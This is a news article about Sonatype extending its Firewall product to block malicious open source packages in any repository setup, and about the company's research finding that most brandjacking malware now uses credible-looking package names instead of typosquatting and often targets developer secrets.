Sonatype has expanded its Firewall product to block malicious open source packages before they enter any repository environment, as its latest research suggests most brandjacking malware no longer relies on typosquatting alone.
The expanded protection now covers any repository environment, including third-party repositories and mixed repository setups. It is designed to stop harmful packages when developers or coding tools pull open source components from public registries.
Alongside the product update, Sonatype published research based on analysis of more than 4,300 malicious open source packages. The study found that attackers are increasingly using package names that appear routine and credible within software projects, rather than obvious misspellings of trusted names.
According to the findings, 91% of the brandjacking malware examined went beyond traditional typosquatting. The study also found that 74% of malicious packages targeted developer data, including environment information, secrets, or both.
The figures point to a shift in how attackers try to gain access to software supply chains. Instead of depending on typing mistakes, campaigns are using naming patterns that resemble legitimate tools, extensions, and framework-related packages.
Changing tactics
Sonatype identified 174 campaign families in the data, suggesting these attacks are becoming more organised. It also found 540 malicious packages targeting the React framework, underlining the focus on widely used developer ecosystems where add-ons and helper packages are common.
This makes traditional spelling-based defences less effective, the company argued. A package can appear normal enough to avoid scrutiny when a developer adds a dependency, updates a lockfile, or installs a utility package tied to a popular framework.
That matters because malicious packages are often designed to steal credentials, API keys, and environment variables from developer machines. If successful, that initial compromise can give attackers a path into broader systems and repositories.
The expanded Firewall is intended to create a control point in front of public package registries before code reaches a build environment. Sonatype described the approach as a way to screen components earlier in the software assembly process without requiring organisations to change repository workflows.
Developer exposure
The broader trend highlighted by the research is that attackers are imitating the language and structure of real software ecosystems. In practice, that means malicious packages can be made to look like ordinary framework plugins, version-related utilities, or operational helper modules.
This creates a challenge for engineering and security teams, particularly as development environments become more automated and AI coding assistants play a larger role in recommending or adding dependencies. A package that looks plausible may pass through normal workflows before anyone has reason to question it.
Sonatype has long been active in the open source package ecosystem through Maven Central and Nexus Repository, giving it visibility into how components are published and consumed. The company is using that position to argue that software security controls need to assess context and campaign behaviour, not just package names.
The findings suggest the label typosquatting no longer captures the main pattern of attack. In Sonatype's view, the more important issue is the creation of manufactured legitimacy through names that fit seamlessly into modern software development practices.
Brian Fox, Chief Technology Officer and Co-Founder of Sonatype and Global Maintainer of Maven Central, commented on the shift in attack methods. "Typosquatting is table stakes now. Attackers aren't just misspelling popular package names - they're copying the language, structure, and habits of real software ecosystems. By the time a malicious package has built a reputation, it may already be in a developer workstation," Fox said.
He also set out the company's argument for earlier intervention in dependency selection. "Developers and AI agents need safer defaults, not more dashboards. The winning model is to approve, block, guide, and remediate when a component is chosen - not after bad code is already in the build," Fox said.